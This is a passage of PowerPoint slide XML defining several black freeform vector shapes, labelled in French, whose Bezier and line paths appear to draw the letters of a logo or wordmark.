          <a:xfrm>
            <a:off x="2687314" y="775211"/>
            <a:ext cx="1721014" cy="207278"/>
            <a:chOff x="1404936" y="4348162"/>
            <a:chExt cx="4044593" cy="450532"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Forme libre : forme 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76463CA0-98E9-4053-82B6-8A240051D2EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404936" y="4356138"/>
              <a:ext cx="320053" cy="434554"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY0" fmla="*/ 38079 h 434554"/>
                <a:gd name="connsiteX1" fmla="*/ 226840 w 320053"/>
                <a:gd name="connsiteY1" fmla="*/ 9504 h 434554"/>
                <a:gd name="connsiteX2" fmla="*/ 163880 w 320053"/>
                <a:gd name="connsiteY2" fmla="*/ -21 h 434554"/>
                <a:gd name="connsiteX3" fmla="*/ -45 w 320053"/>
                <a:gd name="connsiteY3" fmla="*/ -21 h 434554"/>
                <a:gd name="connsiteX4" fmla="*/ -45 w 320053"/>
                <a:gd name="connsiteY4" fmla="*/ 434510 h 434554"/>
                <a:gd name="connsiteX5" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY5" fmla="*/ 434510 h 434554"/>
                <a:gd name="connsiteX6" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY6" fmla="*/ 281062 h 434554"/>
                <a:gd name="connsiteX7" fmla="*/ 163880 w 320053"/>
                <a:gd name="connsiteY7" fmla="*/ 281062 h 434554"/>
                <a:gd name="connsiteX8" fmla="*/ 226840 w 320053"/>
                <a:gd name="connsiteY8" fmla="*/ 270870 h 434554"/>
                <a:gd name="connsiteX9" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY9" fmla="*/ 242295 h 434554"/>
                <a:gd name="connsiteX10" fmla="*/ 308469 w 320053"/>
                <a:gd name="connsiteY10" fmla="*/ 197814 h 434554"/>
                <a:gd name="connsiteX11" fmla="*/ 319995 w 320053"/>
                <a:gd name="connsiteY11" fmla="*/ 140664 h 434554"/>
                <a:gd name="connsiteX12" fmla="*/ 308469 w 320053"/>
                <a:gd name="connsiteY12" fmla="*/ 83514 h 434554"/>
                <a:gd name="connsiteX13" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY13" fmla="*/ 38079 h 434554"/>
                <a:gd name="connsiteX14" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY14" fmla="*/ 185907 h 434554"/>
                <a:gd name="connsiteX15" fmla="*/ 163213 w 320053"/>
                <a:gd name="connsiteY15" fmla="*/ 203338 h 434554"/>
                <a:gd name="connsiteX16" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY16" fmla="*/ 203338 h 434554"/>
                <a:gd name="connsiteX17" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY17" fmla="*/ 78275 h 434554"/>
                <a:gd name="connsiteX18" fmla="*/ 163213 w 320053"/>
                <a:gd name="connsiteY18" fmla="*/ 78275 h 434554"/>
                <a:gd name="connsiteX19" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY19" fmla="*/ 95325 h 434554"/>
                <a:gd name="connsiteX20" fmla="*/ 229126 w 320053"/>
                <a:gd name="connsiteY20" fmla="*/ 140187 h 434554"/>
                <a:gd name="connsiteX21" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY21" fmla="*/ 185907 h 43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53" h="434554">
                  <a:moveTo>
                    <a:pt x="276180" y="38079"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="261777" y="25397"/>
                    <a:pt x="245009" y="15685"/>
                    <a:pt x="226840" y="9504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206527" y="2860"/>
                    <a:pt x="185249" y="-359"/>
                    <a:pt x="163880" y="-21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="281062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163880" y="281062"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="185298" y="281328"/>
                    <a:pt x="206600" y="277880"/>
                    <a:pt x="226840" y="270870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245013" y="264698"/>
                    <a:pt x="261783" y="254986"/>
                    <a:pt x="276180" y="242295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289930" y="229884"/>
                    <a:pt x="300929" y="214732"/>
                    <a:pt x="308469" y="197814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316343" y="179804"/>
                    <a:pt x="320272" y="160317"/>
                    <a:pt x="319995" y="140664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320208" y="121015"/>
                    <a:pt x="316281" y="101543"/>
                    <a:pt x="308469" y="83514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301147" y="66196"/>
                    <a:pt x="290126" y="50689"/>
                    <a:pt x="276180" y="38079"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185907"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198826" y="198196"/>
                    <a:pt x="181177" y="204505"/>
                    <a:pt x="163213" y="203338"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88823" y="203338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="78275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163213" y="78275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181114" y="77074"/>
                    <a:pt x="198728" y="83233"/>
                    <a:pt x="211981" y="95325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223624" y="107284"/>
                    <a:pt x="229825" y="123512"/>
                    <a:pt x="229126" y="140187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229861" y="157124"/>
                    <a:pt x="223670" y="173630"/>
                    <a:pt x="211981" y="185907"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Forme libre : forme 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7804BBEA-D3AA-4506-99BE-EBF552AD671A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1850230" y="4356616"/>
              <a:ext cx="365855" cy="434077"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 299611 w 365855"/>
                <a:gd name="connsiteY0" fmla="*/ 214386 h 434077"/>
                <a:gd name="connsiteX1" fmla="*/ 319995 w 365855"/>
                <a:gd name="connsiteY1" fmla="*/ 139710 h 434077"/>
                <a:gd name="connsiteX2" fmla="*/ 308469 w 365855"/>
                <a:gd name="connsiteY2" fmla="*/ 82560 h 434077"/>
                <a:gd name="connsiteX3" fmla="*/ 276180 w 365855"/>
                <a:gd name="connsiteY3" fmla="*/ 38078 h 434077"/>
                <a:gd name="connsiteX4" fmla="*/ 226840 w 365855"/>
                <a:gd name="connsiteY4" fmla="*/ 9503 h 434077"/>
                <a:gd name="connsiteX5" fmla="*/ 163975 w 365855"/>
                <a:gd name="connsiteY5" fmla="*/ -22 h 434077"/>
                <a:gd name="connsiteX6" fmla="*/ -45 w 365855"/>
                <a:gd name="connsiteY6" fmla="*/ -22 h 434077"/>
                <a:gd name="connsiteX7" fmla="*/ -45 w 365855"/>
                <a:gd name="connsiteY7" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX8" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY8" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX9" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY9" fmla="*/ 280585 h 434077"/>
                <a:gd name="connsiteX10" fmla="*/ 153402 w 365855"/>
                <a:gd name="connsiteY10" fmla="*/ 280585 h 434077"/>
                <a:gd name="connsiteX11" fmla="*/ 265702 w 365855"/>
                <a:gd name="connsiteY11" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX12" fmla="*/ 365810 w 365855"/>
                <a:gd name="connsiteY12" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX13" fmla="*/ 243318 w 365855"/>
                <a:gd name="connsiteY13" fmla="*/ 263535 h 434077"/>
                <a:gd name="connsiteX14" fmla="*/ 299611 w 365855"/>
                <a:gd name="connsiteY14" fmla="*/ 214386 h 434077"/>
                <a:gd name="connsiteX15" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY15" fmla="*/ 185144 h 434077"/>
                <a:gd name="connsiteX16" fmla="*/ 163308 w 365855"/>
                <a:gd name="connsiteY16" fmla="*/ 202194 h 434077"/>
                <a:gd name="connsiteX17" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY17" fmla="*/ 202194 h 434077"/>
                <a:gd name="connsiteX18" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY18" fmla="*/ 77798 h 434077"/>
                <a:gd name="connsiteX19" fmla="*/ 163308 w 365855"/>
                <a:gd name="connsiteY19" fmla="*/ 77798 h 434077"/>
                <a:gd name="connsiteX20" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY20" fmla="*/ 94847 h 434077"/>
                <a:gd name="connsiteX21" fmla="*/ 229126 w 365855"/>
                <a:gd name="connsiteY21" fmla="*/ 139710 h 434077"/>
                <a:gd name="connsiteX22" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY22" fmla="*/ 185144 h 43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5855" h="434077">
                  <a:moveTo>
                    <a:pt x="299611" y="214386"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="313527" y="192007"/>
                    <a:pt x="320614" y="166055"/>
                    <a:pt x="319995" y="139710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320204" y="120062"/>
                    <a:pt x="316280" y="100590"/>
                    <a:pt x="308469" y="82560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301116" y="65533"/>
                    <a:pt x="290096" y="50343"/>
                    <a:pt x="276180" y="38078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261778" y="25396"/>
                    <a:pt x="245004" y="15684"/>
                    <a:pt x="226840" y="9503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206561" y="2865"/>
                    <a:pt x="185311" y="-353"/>
                    <a:pt x="163975" y="-22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="280585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153402" y="280585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265702" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365810" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243318" y="263535"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="266369" y="252830"/>
                    <a:pt x="285895" y="235782"/>
                    <a:pt x="299611" y="214386"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185144"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198760" y="197222"/>
                    <a:pt x="181177" y="203380"/>
                    <a:pt x="163308" y="202194"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88823" y="202194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="77798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163308" y="77798"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181168" y="76657"/>
                    <a:pt x="198732" y="82809"/>
                    <a:pt x="211981" y="94847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223621" y="106807"/>
                    <a:pt x="229822" y="123035"/>
                    <a:pt x="229126" y="139710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229898" y="156567"/>
                    <a:pt x="223697" y="172997"/>
                    <a:pt x="211981" y="185144"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solid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09B62E3E-9DB8-4395-B0D8-F84DAD09792D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2353817" y="4356067"/>
              <a:ext cx="88868" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 88868"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 88868 w 88868"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 88868 w 88868"/>
                <a:gd name="connsiteY2" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 88868"/>
                <a:gd name="connsiteY3" fmla="*/ 434721 h 434721"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="88868" h="434721">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88868" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="434721"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solid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3B272A49-C6C3-4675-9ED0-9114178FB343}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2629947" y="4348162"/>
              <a:ext cx="370141" cy="450532"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY0" fmla="*/ 267367 h 450532"/>
                <a:gd name="connsiteX1" fmla="*/ 29623 w 370141"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 450532"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 370141"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 450532"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 370141"/>
                <a:gd name="connsiteY3" fmla="*/ 442627 h 450532"/>
                <a:gd name="connsiteX4" fmla="*/ 88868 w 370141"/>
                <a:gd name="connsiteY4" fmla="*/ 442627 h 450532"/>
                <a:gd name="connsiteX5" fmla="*/ 88868 w 370141"/>
                <a:gd name="connsiteY5" fmla="*/ 181832 h 450532"/>
                <a:gd name="connsiteX6" fmla="*/ 341185 w 370141"/>
                <a:gd name="connsiteY6" fmla="*/ 450533 h 450532"/>
                <a:gd name="connsiteX7" fmla="*/ 370142 w 370141"/>
                <a:gd name="connsiteY7" fmla="*/ 450533 h 450532"/>
                <a:gd name="connsiteX8" fmla="*/ 370142 w 370141"/>
                <a:gd name="connsiteY8" fmla="*/ 7906 h 450532"/>
                <a:gd name="connsiteX9" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY9" fmla="*/ 7906 h 450532"/>
                <a:gd name="connsiteX10" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY10" fmla="*/ 267367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1" h="450532">
                  <a:moveTo>
                    <a:pt x="281178" y="267367"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29623" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="181832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341185" y="450533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370142" y="450533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370142" y="7906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281178" y="7906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281178" y="267367"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solid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60E5572C-147D-4D0F-B3A0-88C30540A9BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3145535" y="4356067"/>
              <a:ext cx="367474" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY0" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 138970 w 367474"/>
                <a:gd name="connsiteY1" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 138970 w 367474"/>
                <a:gd name="connsiteY2" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 227838 w 367474"/>
                <a:gd name="connsiteY3" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX4" fmla="*/ 227838 w 367474"/>
                <a:gd name="connsiteY4" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX5" fmla="*/ 367475 w 367474"/>
                <a:gd name="connsiteY5" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX6" fmla="*/ 367475 w 367474"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY8" fmla="*/ 80391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74" h="434721">
                  <a:moveTo>
                    <a:pt x="0" y="80391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138970" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138970" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227838" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227838" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367475" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367475" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="80391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Forme libre : forme 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC627D38-D7F1-45EC-B5D6-5631E9E2DCA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657599" y="4356067"/>
              <a:ext cx="300323" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY0" fmla="*/ 244316 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 239078 w 300323"/>
                <a:gd name="connsiteY1" fmla="*/ 244316 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 239078 w 300323"/>
                <a:gd name="connsiteY2" fmla="*/ 168593 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY3" fmla="*/ 168593 h 434721"/>
                <a:gd name="connsiteX4" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY4" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX5" fmla="*/ 292418 w 300323"/>
                <a:gd name="connsiteY5" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX6" fmla="*/ 292418 w 300323"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 300323"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 300323"/>
                <a:gd name="connsiteY8" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX9" fmla="*/ 300323 w 300323"/>
                <a:gd name="connsiteY9" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX10" fmla="*/ 300323 w 300323"/>
                <a:gd name="connsiteY10" fmla="*/ 354330 h 434721"/>
                <a:gd name="connsiteX11" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY11" fmla="*/ 354330 h 434721"/>
                <a:gd name="connsiteX12" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY12" fmla="*/ 244316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323" h="434721">
                  <a:moveTo>
                    <a:pt x="88963" y="244316"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239078" y="244316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239078" y="168593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="168593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292418" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292418" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300323" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300323" y="354330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="354330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="244316"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Forme libre : forme 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6B20002-EDDF-4F0B-9822-8F50BCA46941}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4122514" y="4348162"/>
              <a:ext cx="426053" cy="442626"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 212693 w 426053"/>
                <a:gd name="connsiteY0" fmla="*/ 235839 h 442626"/>
                <a:gd name="connsiteX1" fmla="*/ 29623 w 426053"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 426053"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 426053"/>
                <a:gd name="connsiteY3" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX4" fmla="*/ 88868 w 426053"/>
                <a:gd name="connsiteY4" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX5" fmla="*/ 88868 w 426053"/>
                <a:gd name="connsiteY5" fmla="*/ 210122 h 442626"/>
                <a:gd name="connsiteX6" fmla="*/ 198215 w 426053"/>
                <a:gd name="connsiteY6" fmla="*/ 347758 h 442626"/>
                <a:gd name="connsiteX7" fmla="*/ 227171 w 426053"/>
                <a:gd name="connsiteY7" fmla="*/ 347758 h 442626"/>
                <a:gd name="connsiteX8" fmla="*/ 337185 w 426053"/>
                <a:gd name="connsiteY8" fmla="*/ 210122 h 442626"/>
                <a:gd name="connsiteX9" fmla="*/ 337185 w 426053"/>
                <a:gd name="connsiteY9" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX10" fmla="*/ 426053 w 426053"/>
                <a:gd name="connsiteY10" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX11" fmla="*/ 426053 w 426053"/>
                <a:gd name="connsiteY11" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX12" fmla="*/ 397097 w 426053"/>
                <a:gd name="connsiteY12" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX13" fmla="*/ 212693 w 426053"/>
                <a:gd name="connsiteY13" fmla="*/ 235839 h 44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053" h="442626">
                  <a:moveTo>
                    <a:pt x="212693" y="235839"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29623" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="210122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198215" y="347758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227171" y="347758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337185" y="210122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337185" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426053" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397097" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212693" y="235839"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solid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658E1E9A-FA88-4461-9EF2-A432ADBFF3E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
